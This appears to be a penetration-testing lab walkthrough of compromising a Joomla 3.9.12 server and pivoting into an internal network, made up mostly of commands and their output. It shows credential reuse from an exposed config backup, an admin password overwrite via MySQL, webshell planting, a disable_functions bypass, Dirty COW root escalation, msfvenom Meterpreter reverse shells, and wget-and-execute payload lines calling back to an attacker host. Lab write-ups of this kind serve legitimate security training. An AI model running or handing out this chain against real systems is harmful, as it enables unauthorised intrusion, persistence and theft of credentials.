------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                                                                                                                                                           | php/webapps/43488.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 43488.txt
  Exploit: Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting
      URL: https://www.exploit-db.com/exploits/43488
     Path: /usr/share/exploitdb/exploits/php/webapps/43488.txt
    Codes: CVE-2018-5263
 Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /root/lianxi/43488.txt



┌──(root㉿ru)-[~/lianxi]
└─# ls
43488.txt  ports.gnmap  ports.nmap  ports.xml  port.txt  udp.gnmap  udp.nmap  udp.xml  vuln.gnmap  vuln.nmap  vuln.xml  whatweb.txt  XX.gnmap  XX.nmap  XX.xml

┌──(root㉿ru)-[~/lianxi]
└─# cat 43488.txt
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps

1. Description

Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user’s browser. Works with every version up to 4.0.20


2. Proof of Concept

Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed


3. Solution:

Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update   


We found the matching exploit, but these vulnerabilities all require administrator privileges, so we need to probe further.

5. joomlascan Python script

┌──(root㉿ru)-[~/tools/JoomlaScan]
└─# python2 joomlascan.py -u http://192.168.1.21 -t 5   
-------------------------------------------
             Joomla Scan                  
   Usage: python joomlascan.py <target>    
    Version 0.5beta - Database Entries 1235
         created by Andrea Draghetti       
-------------------------------------------
Robots file found:               > http://192.168.1.21/robots.txt
No Error Log found

Start scan...with 10 concurrent threads!
Component found: com_actionlogs  > http://192.168.1.21/index.php?option=com_actionlogs
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_actionlogs/actionlogs.xml
         Explorable Directory    > http://192.168.1.21/components/com_actionlogs/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_actionlogs/
Component found: com_admin       > http://192.168.1.21/index.php?option=com_admin
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_admin/admin.xml
         Explorable Directory    > http://192.168.1.21/components/com_admin/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_admin/
Component found: com_ajax        > http://192.168.1.21/index.php?option=com_ajax
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_ajax/ajax.xml
         Explorable Directory    > http://192.168.1.21/components/com_ajax/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_ajax/
Component found: com_banners     > http://192.168.1.21/index.php?option=com_banners
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_banners/banners.xml
         Explorable Directory    > http://192.168.1.21/components/com_banners/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_banners/
Component found: com_config      > http://192.168.1.21/index.php?option=com_config
Component found: com_contact     > http://192.168.1.21/index.php?option=com_contact
         LICENSE file found      > http://192.168.1.21/administrator/components/com_contact/contact.xml
         LICENSE file found      > http://192.168.1.21/administrator/components/com_config/config.xml
Component found: com_content     > http://192.168.1.21/index.php?option=com_content
Component found: com_contenthistory      > http://192.168.1.21/index.php?option=com_contenthistory
         But possibly it is not active or protected
         Explorable Directory    > http://192.168.1.21/components/com_config/
         Explorable Directory    > http://192.168.1.21/components/com_contact/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_config/
         LICENSE file found      > http://192.168.1.21/administrator/components/com_content/content.xml
         LICENSE file found      > http://192.168.1.21/administrator/components/com_contenthistory/contenthistory.xml
         Explorable Directory    > http://192.168.1.21/administrator/components/com_contact/
         Explorable Directory    > http://192.168.1.21/components/com_contenthistory/
         Explorable Directory    > http://192.168.1.21/components/com_content/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_contenthistory/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_content/
Component found: com_fields      > http://192.168.1.21/index.php?option=com_fields
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_fields/fields.xml
         Explorable Directory    > http://192.168.1.21/components/com_fields/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_fields/
Component found: com_installer   > http://192.168.1.21/index.php?option=com_installer
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_installer/installer.xml
         Explorable Directory    > http://192.168.1.21/components/com_installer/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_installer/
Component found: com_joomlaupdate        > http://192.168.1.21/index.php?option=com_joomlaupdate
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_joomlaupdate/joomlaupdate.xml
         Explorable Directory    > http://192.168.1.21/components/com_joomlaupdate/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_joomlaupdate/
Component found: com_mailto      > http://192.168.1.21/index.php?option=com_mailto
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/components/com_mailto/mailto.xml
         Explorable Directory    > http://192.168.1.21/components/com_mailto/
Component found: com_media       > http://192.168.1.21/index.php?option=com_media
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_media/media.xml
         Explorable Directory    > http://192.168.1.21/components/com_media/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_media/
Component found: com_newsfeeds   > http://192.168.1.21/index.php?option=com_newsfeeds
         LICENSE file found      > http://192.168.1.21/administrator/components/com_newsfeeds/newsfeeds.xml
         Explorable Directory    > http://192.168.1.21/components/com_newsfeeds/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_newsfeeds/
Component found: com_search      > http://192.168.1.21/index.php?option=com_search
         LICENSE file found      > http://192.168.1.21/administrator/components/com_search/search.xml
         Explorable Directory    > http://192.168.1.21/components/com_search/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_search/
Component found: com_users       > http://192.168.1.21/index.php?option=com_users
         LICENSE file found      > http://192.168.1.21/administrator/components/com_users/users.xml
         Explorable Directory    > http://192.168.1.21/components/com_users/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_users/
Component found: com_wrapper     > http://192.168.1.21/index.php?option=com_wrapper
         LICENSE file found      > http://192.168.1.21/components/com_wrapper/wrapper.xml
         Explorable Directory    > http://192.168.1.21/components/com_wrapper/
End Scanner

6. joomscan Perl script

    perl joomscan.pl -u 192.168.1.21
    
    
    
    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.1.21 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.12

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing : 
http://192.168.1.21/administrator/components
http://192.168.1.21/administrator/modules
http://192.168.1.21/administrator/templates
http://192.168.1.21/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.1.21/administrator/                                                                                    
                                                                                                                                        
[+] Checking robots.txt existing                                                                                                        
[++] robots.txt is found                                                                                                                
path : http://192.168.1.21/robots.txt                                                                                                   
                                                                                                                                        
Interesting path found from robots.txt                                                                                                  
http://192.168.1.21/joomla/administrator/                                                                                               
http://192.168.1.21/administrator/                                                                                                      
http://192.168.1.21/bin/                                                                                                                
http://192.168.1.21/cache/                                                                                                              
http://192.168.1.21/cli/                                                                                                                
http://192.168.1.21/components/                                                                                                         
http://192.168.1.21/includes/                                                                                                           
http://192.168.1.21/installation/                                                                                                       
http://192.168.1.21/language/                                                                                                           
http://192.168.1.21/layouts/                                                                                                            
http://192.168.1.21/libraries/                                                                                                          
http://192.168.1.21/logs/                                                                                                               
http://192.168.1.21/modules/                                                                                                            
http://192.168.1.21/plugins/                                                                                                            
http://192.168.1.21/tmp/                                                                                                                
                                                                                                                                        
                                                                                                                                        
[+] Finding common backup files name                                                                                                    
[++] Backup files are not found                                                                                                         
                                                                                                                                        
[+] Finding common log files name                                                                                                       
[++] error log is not found                                                                                                             
                                                                                                                                        
[+] Checking sensitive config.php.x file                                                                                                
[++] Readable config file is found                                                                                                      
 config file path : http://192.168.1.21/configuration.php~                                                                              
                                                                                                                                        
                                                                                                                                        
                                                                                                                                        
Your Report : reports/192.168.1.21/ 

None of this leads anywhere on its own (the core is reported as not vulnerable), so the remaining option is to log in remotely to the target's MySQL with the database credentials exposed by the readable configuration.php~ backup that joomscan flagged above.

MySQL

1. Remote login

┌──(root?ru)-[~]
└─# mysql -u testuser -h 192.168.1.21 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 4306
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.001 sec)


2. Look at the sensitive data

MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| am2zu_action_log_config       |
| am2zu_action_logs             |
| am2zu_action_logs_extensions  |
| am2zu_action_logs_users       |
| am2zu_assets                  |
| am2zu_associations            |
| am2zu_banner_clients          |
| am2zu_banner_tracks           |
| am2zu_banners                 |
| am2zu_categories              |
| am2zu_contact_details         |
| am2zu_content                 |
| am2zu_content_frontpage       |
| am2zu_content_rating          |
| am2zu_content_types           |
| am2zu_contentitem_tag_map     |
| am2zu_core_log_searches       |
| am2zu_extensions              |
| am2zu_fields                  |
| am2zu_fields_categories       |
| am2zu_fields_groups           |
| am2zu_fields_values           |
| am2zu_finder_filters          |
| am2zu_finder_links            |
| am2zu_finder_links_terms0     |
| am2zu_finder_links_terms1     |
| am2zu_finder_links_terms2     |
| am2zu_finder_links_terms3     |
| am2zu_finder_links_terms4     |
| am2zu_finder_links_terms5     |
| am2zu_finder_links_terms6     |
| am2zu_finder_links_terms7     |
| am2zu_finder_links_terms8     |
| am2zu_finder_links_terms9     |
| am2zu_finder_links_termsa     |
| am2zu_finder_links_termsb     |
| am2zu_finder_links_termsc     |
| am2zu_finder_links_termsd     |
| am2zu_finder_links_termse     |
| am2zu_finder_links_termsf     |
| am2zu_finder_taxonomy         |
| am2zu_finder_taxonomy_map     |
| am2zu_finder_terms            |
| am2zu_finder_terms_common     |
| am2zu_finder_tokens           |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types            |
| am2zu_languages               |
| am2zu_menu                    |
| am2zu_menu_types              |
| am2zu_messages                |
| am2zu_messages_cfg            |
| am2zu_modules                 |
| am2zu_modules_menu            |
| am2zu_newsfeeds               |
| am2zu_overrider               |
| am2zu_postinstall_messages    |
| am2zu_privacy_consents        |
| am2zu_privacy_requests        |
| am2zu_redirect_links          |
| am2zu_schemas                 |
| am2zu_session                 |
| am2zu_tags                    |
| am2zu_template_styles         |
| am2zu_ucm_base                |
| am2zu_ucm_content             |
| am2zu_ucm_history             |
| am2zu_update_sites            |
| am2zu_update_sites_extensions |
| am2zu_updates                 |
| am2zu_user_keys               |
| am2zu_user_notes              |
| am2zu_user_profiles           |
| am2zu_user_usergroup_map      |
| am2zu_usergroups              |
| am2zu_users                   |
| am2zu_utf8_conversion         |
| am2zu_viewlevels              |
| umnbt_action_log_config       |
| umnbt_action_logs             |
| umnbt_action_logs_extensions  |
| umnbt_action_logs_users       |
| umnbt_assets                  |
| umnbt_associations            |
| umnbt_banner_clients          |
| umnbt_banner_tracks           |
| umnbt_banners                 |
| umnbt_categories              |
| umnbt_contact_details         |
| umnbt_content                 |
| umnbt_content_frontpage       |
| umnbt_content_rating          |
| umnbt_content_types           |
| umnbt_contentitem_tag_map     |
| umnbt_core_log_searches       |
| umnbt_extensions              |
| umnbt_fields                  |
| umnbt_fields_categories       |
| umnbt_fields_groups           |
| umnbt_fields_values           |
| umnbt_finder_filters          |
| umnbt_finder_links            |
| umnbt_finder_links_terms0     |
| umnbt_finder_links_terms1     |
| umnbt_finder_links_terms2     |
| umnbt_finder_links_terms3     |
| umnbt_finder_links_terms4     |
| umnbt_finder_links_terms5     |
| umnbt_finder_links_terms6     |
| umnbt_finder_links_terms7     |
| umnbt_finder_links_terms8     |
| umnbt_finder_links_terms9     |
| umnbt_finder_links_termsa     |
| umnbt_finder_links_termsb     |
| umnbt_finder_links_termsc     |
| umnbt_finder_links_termsd     |
| umnbt_finder_links_termse     |
| umnbt_finder_links_termsf     |
| umnbt_finder_taxonomy         |
| umnbt_finder_taxonomy_map     |
| umnbt_finder_terms            |
| umnbt_finder_terms_common     |
| umnbt_finder_tokens           |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types            |
| umnbt_languages               |
| umnbt_menu                    |
| umnbt_menu_types              |
| umnbt_messages                |
| umnbt_messages_cfg            |
| umnbt_modules                 |
| umnbt_modules_menu            |
| umnbt_newsfeeds               |
| umnbt_overrider               |
| umnbt_postinstall_messages    |
| umnbt_privacy_consents        |
| umnbt_privacy_requests        |
| umnbt_redirect_links          |
| umnbt_schemas                 |
| umnbt_session                 |
| umnbt_tags                    |
| umnbt_template_styles         |
| umnbt_ucm_base                |
| umnbt_ucm_content             |
| umnbt_ucm_history             |
| umnbt_update_sites            |
| umnbt_update_sites_extensions |
| umnbt_updates                 |
| umnbt_user_keys               |
| umnbt_user_notes              |
| umnbt_user_profiles           |
| umnbt_user_usergroup_map      |
| umnbt_usergroups              |
| umnbt_users                   |
| umnbt_utf8_conversion         |
| umnbt_viewlevels              |
+-------------------------------+
156 rows in set (0.001 sec)

MySQL [joomla]>

MySQL [joomla]> select username,0x3a,password from umnbt_users;
+----------+------+--------------------------------------------------------------+
| username | 0x3a | password                                                     |
+----------+------+--------------------------------------------------------------+
| admin    | :    | $2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy |
+----------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)

MySQL [joomla]> select username,0x3a,password from am2zu_users;
+---------------+------+--------------------------------------------------------------+
| username      | 0x3a | password                                                     |
+---------------+------+--------------------------------------------------------------+
| administrator | :    | $2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy |
+---------------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)

Change the password with a MySQL UPDATE

update am2zu_users set password = md5("root") where id = 891;



In the Joomla user list both accounts carry a Super User label, so they almost certainly have full privileges. We set the administrator account's password to root directly. The stored hashes are bcrypt ($2y$10$...), but Joomla 3's password check still accepts a legacy unsalted MD5 hex digest in the password column and rehashes it to bcrypt on the next successful login, which is why a plain MD5 of "root" works here. The user id used in the WHERE clause does not appear in the SELECT output above; filtering on the username column instead avoids guessing it. Copy the original bcrypt hash somewhere first so the account can be restored afterwards.
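The reason the MD5 trick works is the order in which Joomla 3 decides how to verify a stored password value. The following is an added example, not code from the original post or from Joomla: it mirrors the branch selection of Joomla 3's JUserHelper::verifyPassword() in Python and implements the legacy MD5 branch, so you can see exactly what value the UPDATE above writes and why Joomla accepts it. The bcrypt hash used in the demonstration is the administrator hash from the am2zu_users dump on this page.

```python
import hashlib
import hmac

# Added example, not code from the original post or from Joomla itself. It
# mirrors the dispatch in Joomla 3's JUserHelper::verifyPassword(): a value
# starting with '$P$' is phpass, any other value starting with '$' goes to
# PHP's password_verify() (the bcrypt '$2y$' hashes seen in the dump),
# '{SHA256}' is the old SHA-256 scheme, and everything else is the legacy
# 'md5hex' or 'md5hex:salt' form compared against md5(password + salt).
# Only the legacy MD5 branch is implemented here. After a successful login
# Joomla rehashes such a value to bcrypt, so the column changes again.


def classify_hash(stored: str) -> str:
    """Which branch of verifyPassword() a stored value would take."""
    if stored.startswith("$P$"):
        return "phpass"
    if stored.startswith("$"):
        return "password_verify"      # bcrypt ($2y$) and other crypt() formats
    if stored.startswith("{SHA256}"):
        return "legacy-sha256"
    return "legacy-md5"


def legacy_md5_hash(password: str, salt: str = "") -> str:
    """Produce the legacy stored form. With an empty salt this is exactly the
    value that MySQL's MD5('root') writes in the UPDATE above."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}" if salt else digest


def legacy_md5_verify(password: str, stored: str) -> bool:
    """The fallback branch: split 'md5hex[:salt]' and compare in constant time."""
    kind = classify_hash(stored)
    if kind != "legacy-md5":
        raise ValueError(f"stored value is {kind}, not legacy MD5")
    digest, _, salt = stored.partition(":")
    candidate = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    # Hash copied from the am2zu_users dump on this page.
    bcrypt_value = "$2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy"
    print(classify_hash(bcrypt_value))
    replacement = legacy_md5_hash("root")
    print(replacement, legacy_md5_verify("root", replacement))
```

Because the legacy branch ignores salts unless a colon is present, the unsalted digest is the weakest form Joomla will accept; that is convenient for the attacker and a useful thing for a defender to look for in the users table (any row whose password is 32 hex characters with no `$` prefix).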

Logging in to the backend

1. Successful login



The login succeeds; from here on everything is done as the administrator user.

2. RCE

Reference: https://www.cnblogs.com/starci/p/15174896.html




Click "Options" in the media component and set "Path to Files Folder" to the current directory "./".
The media manager can now browse every folder and file under the web root: the restriction to the images folder is gone and we have directory traversal over the whole site.


From here we could get command execution by editing an existing file. Instead we try another route.

AntSword connection

1. Writing the shell



According to the collected references, the default path from which a written file executes is http://localhost/templates/beez3/*.php

We only need to write the webshell into that directory.




That is the path; we insert the webshell into one of the PHP files the backend already has there.

GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCE: https://github.com/HoangKien1020/CVE-2021-23132




The test succeeds, so the webshell can be written.



2. disable_functions bypass



Running commands from AntSword fails. On inspection, PHP's disable_functions setting blocks the command-execution functions, so a bypass is needed. Either search GitHub for a suitable exploit or use AntSword's built-in disable_functions bypass plugin.

GitHub - l3m0n/Bypass_Disable_functions_Shell: a webshell that breaks out of disable_functions to command execution in several ways: https://github.com/l3m0n/Bypass_Disable_functions_Shell




Either of the two bypass modes shown can be tried.




(www-data:/etc) $ netstat -anlpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44095    ESTABLISHED -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44093    TIME_WAIT   -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44094    TIME_WAIT   -  

The local address in the netstat output is 192.168.93.120, not 192.168.1.21, so the web server we have been talking to sits behind a reverse proxy: the host 192.168.93.100 (the CentOS box whose external address is 192.168.1.21) forwards our requests to the Ubuntu web server at 192.168.93.120. 192.168.93.100 is therefore the host that relays external traffic, and taking that machine is the next step.


In the /tmp directory we find test.txt, which contains an account and its password:

adduser wwwuser
passwd wwwuser_123Aqx

SSH connection

The CentOS 6 sshd only offers ssh-rsa and ssh-dss host keys, which current OpenSSH clients refuse by default; the -oHostKeyAlgorithms option re-enables them for this connection.

┌──(root?ru)-[~/lianxi]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss wwwuser@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
RSA key fingerprint is SHA256:pVIGFsCgpYpKxtt43DtcC9NUBpUvyNCfIitNR9UsPRA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (RSA) to the list of known hosts.
wwwuser@192.168.1.21's password:
Last login: Sun Oct  6 20:24:43 2019 from 192.168.1.122
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ id
uid=500(wwwuser) gid=500(wwwuser) groups=500(wwwuser) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[wwwuser@localhost ~]$


[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[wwwuser@localhost ~]$ find / -perm -u=s f 2>/dev/null
[wwwuser@localhost ~]$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/crontab
/usr/bin/sudo
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
[wwwuser@localhost ~]$

Reference: Dirty COW privilege escalation walkthrough and how to get a fully interactive shell (先知社区): https://xz.aliyun.com/t/9757


Looking around, the host is a candidate for kernel privilege escalation: kernel 2.6.32-431.el6 is within the range affected by Dirty COW (CVE-2016-5195).

Privilege escalation

┌──(root?ru)-[~/tools/loudong/zangniu]
└─# php -S 0:8080                                
[Sat Dec  2 17:53:11 2023] PHP 8.2.7 Development Server (http://0:8080) started


[wwwuser@localhost tmp]$ wget http://192.168.1.20:8080/dirty.c
--2019-10-07 10:12:15--  http://192.168.1.20:8080/dirty.c
Connecting to 192.168.1.20:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4815 (4.7K) [text/x-c]
Saving to: 'dirty.c'

100%[======================================>] 4,815       --.-K/s   in 0s

2019-10-07 10:12:15 (21.0 MB/s) - 'dirty.c' saved [4815/4815]

[wwwuser@localhost tmp]$ ls
dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ chmod +x dirty.c
[wwwuser@localhost tmp]$


[wwwuser@localhost tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ ./dirty
File /tmp/passwd.bak already exists! Please delete it and run again
[wwwuser@localhost tmp]$ cd /home
[wwwuser@localhost home]$ ls
wwwuser
[wwwuser@localhost home]$ cd wwwuser
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ cp /tmp/passwd.bak .
[wwwuser@localhost ~]$ ls
passwd.bak
[wwwuser@localhost home]$ cd /tmp


[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ rm passwd.bak
[wwwuser@localhost tmp]$ clear
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  yum.log
[wwwuser@localhost tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:  (ls)
Complete line:
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash

mmap: 7f18ff557000

madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'ls'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$


┌──(root?ru)-[~/tools/loudong/zangniu]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss firefart@192.168.1.21
firefart@192.168.1.21's password: 
Last login: Sun Oct  6 20:25:55 2019 from 192.168.1.122
[firefart@localhost ~]# whoami
firefart
[firefart@localhost ~]# cd /root
[firefart@localhost ~]# ls
anaconda-ks.cfg  install.log  install.log.syslog  nginx-1.9.4  nginx-1.9.4.tar.gz
[firefart@localhost ~]# id
uid=0(firefart) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[firefart@localhost ~]# 


That completes the external foothold: Dirty COW gave us root. The exploit's own reminder applies: the race can leave the box unstable, and /etc/passwd should be restored from /tmp/passwd.bak once the firefart account is no longer needed. Next comes lateral movement into 192.168.93.0/24.

Internal network penetration

Lateral movement 1

1. Generate the payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=1111 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf -o shell.elf


msfvenom generates a Linux x64 Meterpreter reverse shell.
The payload connects back to the attacker at 192.168.1.25 port 1111 (the Kali host's address changed from 192.168.1.20 in the earlier steps to 192.168.1.25 from here on; the handler output below confirms 192.168.1.25).
The session communication timeout and expiration timeout are both set to 0, so the session stays alive until it is closed explicitly.


-p : the payload

LHOST=192.168.1.25 LPORT=1111 : the listener address and port (option names are case-insensitive but must be written without spaces)

SessionCommunicationTimeout=0 : no communication timeout for the session

SessionExpirationTimeout=0 : no expiration timeout for the session

-f elf : output format

-o shell.elf : output file


2. Start the listener

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

lhosts => 192.168.1.25
msf6 exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.25     yes       The listen address (an interface may be specified)
   LPORT  1111             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp


[firefart@localhost tmp]# wget http://192.168.1.25/shell.elf
--2019-10-07 11:03:06--  http://192.168.1.25/shell.elf
Connecting to 192.168.1.25:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'shell.elf'

100%[======================================>] 250         --.-K/s   in 0s

2019-10-07 11:03:06 (46.8 MB/s) - 'shell.elf' saved [250/250]

[firefart@localhost tmp]# ls
dirty  dirty.c  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# chmod +x shell.elf
[firefart@localhost tmp]# ./shell.elf


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.25:1111
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.25:1111 -> 192.168.1.21:36214) at 2023-12-03 09:17:39 +0800

meterpreter > getuid
Server username: firefart


3. Add an internal route

List the pivot host's subnets


meterpreter > run get_local_subnets   // list the subnets the pivot can reach

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.93.0/255.255.255.0

meterpreter > run autoroute -s 192.168.93.0/24  // route the internal network through this session
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.1.21
[*] Use the -p option to list all active routes

meterpreter > run autoroute -p  // show Meterpreter's current routing table
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.93.0       255.255.255.0      Session 1



Lateral movement 2

1. Set up the listener

use exploit/multi/script/web_delivery

......

msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.25:4444
[*] Using URL: http://192.168.1.25/0796Iv35A4
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[*] 192.168.1.21     web_delivery - Delivering Payload (250 bytes)
